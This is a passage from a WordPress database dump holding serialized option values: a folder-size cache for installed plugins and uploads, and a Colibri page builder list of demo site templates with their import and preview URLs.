";i:5656;s:66:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/hooks\";i:5007;s:87:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/modals/settings\";i:13830;s:78:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/modals\";i:32519;s:79:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/notices\";i:11746;s:85:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/icons/library\";i:24128;s:77:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/icons\";i:24982;s:80:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components/popovers\";i:2623;s:71:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/components\";i:108683;s:66:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/state\";i:15459;s:73:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/pages/layout\";i:5889;s:66:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/pages\";i:22200;s:65:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/util\";i:2533;s:64:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src/api\";i:8533;s:60:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/src\";i:207066;s:72:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/app/Controllers\";i:7919;s:60:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/app\";i:48815;s:63:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/routes\";i:2011;s:67:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk/editorplus\";i:9951;s:56:\"/var/www/html/wp-content/plugins/ml-slider/extendify-sdk\";i:767107;s:63:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/upgrade\";i:23285;s:64:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/features\";i:22531;s:63:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/notices\";i:23248;s:64:\"/var/www/html/wp-content/plugins/ml-slider/admin/images/seasonal\";i:36462;s:55:\"/var/www/html/wp-content/plugins/ml-slider/admin/images\";i:151319;s:52:\"/var/www/html/wp-content/plugins/ml-slider/admin/lib\";i:30438;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/slides/tabs\";i:5862;s:61:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/slides\";i:5862;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/notices\";i:1344;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/pages/parts\";i:12580;s:60:\"/var/www/html/wp-content/plugins/ml-slider/admin/views/pages\";i:36578;s:54:\"/var/www/html/wp-content/plugins/ml-slider/admin/views\";i:43784;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/colorbox/images/ie6\";i:1300;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/colorbox/images\";i:14071;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/colorbox\";i:46362;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor/tipsy\";i:11953;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/vendor\";i:58315;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/images\";i:354600;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/gutenberg/components\";i:13708;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/gutenberg\";i:16775;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/store/modules\";i:5299;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/store\";i:6365;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides/import\";i:6050;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides/parts\";i:3182;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides/external\";i:20260;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slides\";i:32271;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/utils\";i:671;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/assets/styles\";i:3211;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/assets\";i:3211;s:68:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/extra\";i:3999;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/notices\";i:7698;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/previews\";i:10131;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slideshows/settings\";i:6122;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slideshows/nav\";i:22887;s:73:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/slideshows\";i:45019;s:67:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/tour\";i:3994;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/themes\";i:21443;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/api/external\";i:1331;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/api\";i:9106;s:85:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/inputs/alerts\";i:1159;s:87:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/inputs/shimmers\";i:4492;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/inputs\";i:15035;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/components\";i:1598;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/pages\";i:35409;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/stubs\";i:2257;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings/layouts\";i:872;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app/settings\";i:57334;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js/app\";i:210523;s:58:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/js\";i:252716;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/common/css\";i:675;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/common\";i:675;s:87:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/content-visible\";i:1437;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/chosen\";i:58825;s:80:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/facebook\";i:17168;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/testbed\";i:1091;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/tooltip\";i:4749;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/dolls\";i:2160;s:80:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/viewport\";i:3831;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/simple\";i:992;s:86:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/element-scroll\";i:30018;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/pin\";i:1037;s:85:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/out-of-bounds\";i:1271;s:86:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/enable-disable\";i:1248;s:84:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/resources/js\";i:337915;s:85:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/resources/css\";i:134;s:81:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/resources\";i:338049;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples/scroll\";i:58996;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/examples\";i:521547;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/js\";i:46157;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/css/helpers\";i:8114;s:77:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/css/mixins\";i:216;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src/css\";i:9515;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/src\";i:55672;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/dist/js\";i:81821;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/dist/css\";i:30389;s:67:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether/dist\";i:112210;s:62:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether\";i:704613;s:81:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src/eager\";i:3360;s:78:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src/js\";i:15039;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src/css\";i:24952;s:75:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/src\";i:43351;s:82:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist/eager\";i:4842;s:79:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist/js\";i:79728;s:80:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist/css\";i:77153;s:76:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd/dist\";i:161723;s:71:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/tether-shepherd\";i:219938;s:69:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css/gutenberg\";i:1139;s:70:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css/components\";i:4184;s:65:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css/parts\";i:198;s:59:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/css\";i:34631;s:63:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/dist/js\";i:1314136;s:64:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/dist/css\";i:5069614;s:60:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets/dist\";i:6383750;s:55:\"/var/www/html/wp-content/plugins/ml-slider/admin/assets\";i:8009133;s:56:\"/var/www/html/wp-content/plugins/ml-slider/admin/support\";i:13107;s:66:\"/var/www/html/wp-content/plugins/ml-slider/admin/slideshows/slides\";i:7963;s:59:\"/var/www/html/wp-content/plugins/ml-slider/admin/slideshows\";i:62698;s:55:\"/var/www/html/wp-content/plugins/ml-slider/admin/routes\";i:37938;s:48:\"/var/www/html/wp-content/plugins/ml-slider/admin\";i:8389232;s:42:\"/var/www/html/wp-content/plugins/ml-slider\";i:19749420;s:101:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/proteusthemes/wp-content-importer-v2/src\";i:95981;s:97:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/proteusthemes/wp-content-importer-v2\";i:97633;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/proteusthemes\";i:97633;s:69:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor/composer\";i:19632;s:60:\"/var/www/html/wp-content/plugins/colibri-page-builder/vendor\";i:117434;s:83:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/migration\";i:2650;s:81:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/options\";i:272;s:99:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/sidebar\";i:126406;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/page\";i:573733;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/header\";i:180882;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/main\";i:244118;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials/footer\";i:8403;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3/partials\";i:1133542;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-3\";i:1183765;s:99:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/sidebar\";i:126406;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/page\";i:590322;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/header\";i:176218;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/main\";i:244311;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials/footer\";i:8403;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1/partials\";i:1145660;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-1\";i:1198615;s:97:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/sidebar\";i:125785;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/header\";i:381697;s:94:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/main\";i:241524;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials/footer\";i:8377;s:89:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import/partials\";i:757383;s:80:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import\";i:801749;s:99:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/sidebar\";i:126406;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/page\";i:583711;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/header\";i:202156;s:96:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/main\";i:244124;s:98:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials/footer\";i:8377;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2/partials\";i:1164774;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data/import-2\";i:1215331;s:73:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/data\";i:4457081;s:93:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/integrations/woocommerce\";i:3575;s:81:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/integrations\";i:7892;s:95:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/features/multiple-partials\";i:1152;s:77:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/features\";i:1240;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/images\";i:1348874;s:85:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/js\";i:7995250;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/fancybox\";i:81009;s:88:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/fonts\";i:372837;s:86:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static/css\";i:1723004;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/static\";i:10924300;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets/partials-images\";i:2307114;s:75:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/assets\";i:14589148;s:72:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/api\";i:9915;s:101:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/customizer/editor-data/page-list\";i:1226;s:91:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/customizer/editor-data\";i:9789;s:79:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/customizer\";i:21309;s:84:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/shortcodes/blog\";i:36287;s:79:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/shortcodes\";i:136054;s:82:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/partials/blog\";i:2927;s:77:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/partials\";i:28916;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder/admin\";i:6;s:68:\"/var/www/html/wp-content/plugins/colibri-page-builder/extend-builder\";i:19346292;s:71:\"/var/www/html/wp-content/plugins/colibri-page-builder/utils/pro-upgrade\";i:2287;s:59:\"/var/www/html/wp-content/plugins/colibri-page-builder/utils\";i:23493;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/js/customizer\";i:120592;s:63:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/js\";i:124761;s:64:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/css\";i:50627;s:65:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets/ocdi\";i:15808;s:60:\"/var/www/html/wp-content/plugins/colibri-page-builder/assets\";i:194713;s:75:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Customizer/Panels\";i:1955;s:77:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Customizer/Settings\";i:1065;s:68:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Customizer\";i:30436;s:64:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Notify\";i:10237;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/DemoImport/Views\";i:5068;s:74:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/DemoImport/Hooks\";i:19932;s:68:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/DemoImport\";i:30421;s:65:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/License\";i:35174;s:62:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/OCDI\";i:111987;s:63:\"/var/www/html/wp-content/plugins/colibri-page-builder/src/Utils\";i:3262;s:57:\"/var/www/html/wp-content/plugins/colibri-page-builder/src\";i:267378;s:69:\"/var/www/html/wp-content/plugins/colibri-page-builder/recommendations\";i:21951;s:61:\"/var/www/html/wp-content/plugins/colibri-page-builder/support\";i:875;s:67:\"/var/www/html/wp-content/plugins/colibri-page-builder/demo-importer\";i:13604;s:53:\"/var/www/html/wp-content/plugins/colibri-page-builder\";i:20020501;s:32:\"/var/www/html/wp-content/plugins\";i:179795926;s:44:\"/var/www/html/wp-content/uploads/astra-sites\";i:0;s:40:\"/var/www/html/wp-content/uploads/colibri\";i:7223865;s:40:\"/var/www/html/wp-content/uploads/2022/01\";i:0;s:40:\"/var/www/html/wp-content/uploads/2022/03\";i:69212067;s:40:\"/var/www/html/wp-content/uploads/2022/02\";i:31272783;s:37:\"/var/www/html/wp-content/uploads/2022\";i:100484850;s:40:\"/var/www/html/wp-content/uploads/2021/11\";i:6932170;s:40:\"/var/www/html/wp-content/uploads/2021/12\";i:40402;s:40:\"/var/www/html/wp-content/uploads/2021/06\";i:1984397;s:40:\"/var/www/html/wp-content/uploads/2021/10\";i:16182290;s:40:\"/var/www/html/wp-content/uploads/2021/07\";i:0;s:40:\"/var/www/html/wp-content/uploads/2021/04\";i:15148226;s:40:\"/var/www/html/wp-content/uploads/2021/05\";i:0;s:40:\"/var/www/html/wp-content/uploads/2021/08\";i:1438377;s:40:\"/var/www/html/wp-content/uploads/2021/09\";i:5929633;s:37:\"/var/www/html/wp-content/uploads/2021\";i:47655495;s:49:\"/var/www/html/wp-content/uploads/elementor/thumbs\";i:63128;s:46:\"/var/www/html/wp-content/uploads/elementor/css\";i:25563;s:42:\"/var/www/html/wp-content/uploads/elementor\";i:88691;s:32:\"/var/www/html/wp-content/uploads\";i:155452901;}','yes'),(347,'cp_initialize_notifications','1644939950','yes'),(348,'colibri_page_builder_demo_sites','a:2:{s:9:\"timestamp\";i:1732908486;s:4:\"data\";a:99:{i:0;a:11:{s:16:\"import_file_name\";s:10:\"Business I\";s:4:\"slug\";s:8:\"business\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business/customizer.dat\";s:24:\"import_preview_image_url\";s:90:\"https://static.colibriwp.com/templates-screenshots/colibri_default_business/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/business-i/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:04.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:1;a:11:{s:16:\"import_file_name\";s:11:\"Business II\";s:4:\"slug\";s:11:\"business-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-ii/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/business-ii/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/business-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:06.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:2;a:11:{s:16:\"import_file_name\";s:7:\"Plumber\";s:4:\"slug\";s:7:\"plumber\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/plumber/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/plumber/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/plumber/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/plumber/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/plumber/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:07.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:3;a:11:{s:16:\"import_file_name\";s:17:\"Creative Agency I\";s:4:\"slug\";s:11:\"advertising\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/advertising/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/advertising/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/advertising/customizer.dat\";s:24:\"import_preview_image_url\";s:97:\"https://static.colibriwp.com/templates-screenshots/colibri_default_creative_agency/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/creative-agency-i/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:09.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:4;a:11:{s:16:\"import_file_name\";s:3:\"SEO\";s:4:\"slug\";s:3:\"seo\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/seo/content.xml\";s:22:\"import_widget_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/seo/widgets.wie\";s:26:\"import_customizer_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/seo/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/colibri_default_seo/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/seo-demo/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:5;a:11:{s:16:\"import_file_name\";s:11:\"IT Services\";s:4:\"slug\";s:11:\"it-services\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/it-services/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/it-services/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/it-services/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/it-services/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/it-services\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:13.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:6;a:11:{s:16:\"import_file_name\";s:20:\"Designer Portfolio I\";s:4:\"slug\";s:20:\"designer-portfolio-i\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-i/content.xml\";s:22:\"import_widget_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-i/widgets.wie\";s:26:\"import_customizer_file_url\";s:100:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-i/customizer.dat\";s:24:\"import_preview_image_url\";s:86:\"https://static.colibriwp.com/templates-screenshots/designer-portfolio-i/screenshot.png\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/designer-portfolio-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:12.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:7;a:11:{s:16:\"import_file_name\";s:21:\"Designer Portfolio II\";s:4:\"slug\";s:21:\"designer-portfolio-ii\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-ii/content.xml\";s:22:\"import_widget_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:101:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:87:\"https://static.colibriwp.com/templates-screenshots/designer-portfolio-ii/screenshot.png\";s:11:\"preview_url\";s:58:\"https://colibriwp-work.colibriwp.com/designer-portfolio-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:16.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:8;a:11:{s:16:\"import_file_name\";s:12:\"Business 